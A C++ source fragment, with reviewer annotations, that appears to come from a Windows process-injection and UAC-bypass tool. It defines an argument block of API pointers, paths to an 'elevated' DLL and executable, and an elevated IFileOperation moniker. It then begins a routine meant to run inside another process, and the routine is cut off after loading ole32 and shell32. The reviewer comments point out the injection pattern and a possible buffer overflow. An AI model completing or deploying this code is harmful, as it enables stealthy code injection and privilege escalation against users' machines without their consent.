#define _HAS_EXCEPTIONS 0
#include <windows.h>
#include <commctrl.h>
#include <shlobj.h>
#include <psapi.h>
// Argument block passed by pointer to RemoteCodeFunc. The visible part of that
// routine calls FLoadLibrary and reads NameOle32 / NameShell32 through this pointer
// instead of calling the APIs or using string literals directly.
// NOTE(review): the struct name and the "passed back to original process" remark on
// RemoteCodeFunc suggest this block is copied into another process and consumed
// there - confirm against the code that fills and transfers it (not shown here).
// If so, the field order and sizes are a binary contract between both sides, and
// the pattern (a self-contained argument block of API pointers and import names)
// is one that defenders typically associate with cross-process memory writes
// followed by remote thread creation.
struct InjectArgs
{
// Functions: API entry points held as pointers and invoked as Args->F...().
// The signatures mirror FreeLibrary, LoadLibraryW (LPCWSTR argument),
// GetProcAddress, CloseHandle and WaitForSingleObject.
// NOTE(review): presumably set to the kernel32 exports of the same names by the
// caller; the assignment is outside this view - verify.
BOOL (WINAPI *FFreeLibrary)(HMODULE hLibModule);
HMODULE (WINAPI *FLoadLibrary)(LPCWSTR lpLibFileName);
FARPROC (WINAPI *FGetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
BOOL (WINAPI *FCloseHandle)(HANDLE);
DWORD (WINAPI *FWaitForSingleObject)(HANDLE,DWORD);
// Static strings: fixed-size wide-character buffers of MAX_PATH elements each.
// NOTE(review): whatever fills these must bound every copy to MAX_PATH wchar_t
// and NUL-terminate; a longer path would overflow into the next field. The
// filling code is not visible here - confirm it checks lengths.
wchar_t szSourceDll[MAX_PATH];
wchar_t szElevDir[MAX_PATH];
wchar_t szElevDll[MAX_PATH];
wchar_t szElevDllFull[MAX_PATH];
wchar_t szElevExeFull[MAX_PATH];
wchar_t szElevArgs[MAX_PATH];
wchar_t szEIFOMoniker[MAX_PATH]; // szElevatedIFileOperationMoniker
// GUIDs, stored by value. Despite the "pIID_" prefix these are IID objects,
// not pointers to IIDs.
IID pIID_EIFO;
IID pIID_ShellItem2;
IID pIID_Unknown;
// DLL and import names. Module names are wide strings (they are passed to
// FLoadLibrary, which takes LPCWSTR); import names are narrow strings
// (FGetProcAddress takes LPCSTR for the procedure name).
// Each buffer is 20 elements, except NameSHCreateItemFromParsingName (30);
// the stored name plus its terminating NUL must fit.
wchar_t NameShell32[20];
wchar_t NameOle32[20];
char NameCoInitialize[20];
char NameCoUninitialize[20];
char NameCoGetObject[20];
char NameCoCreateInstance[20];
char NameSHCreateItemFromParsingName[30];
char NameShellExecuteExW[20];
// IMPORTANT (original author's note): these structures are embedded in the
// argument block rather than allocated elsewhere, so their location is known.
// NOTE(review): SHELLEXECUTEINFO resolves to the A or W variant depending on
// whether UNICODE is defined, while the import name field above is for
// ShellExecuteExW - this looks like it assumes a UNICODE build; confirm.
SHELLEXECUTEINFO shinfo;
BIND_OPTS3 bo;
};
// Important: the value returned here is passed back to the original process as the result code (1 = success, 0 = failure).
static DWORD WINAPI RemoteCodeFunc(InjectArgs * Args)
{
NTSTATUS Status = 0;
HMODULE ModuleOle32 = Args->FLoadLibrary(Args->NameOle32);
HMODULE ModuleShell32 = Args->FLoadLibrary(Args->NameShell32);
if (!ModuleOle32 || !ModuleShell32)
return 0;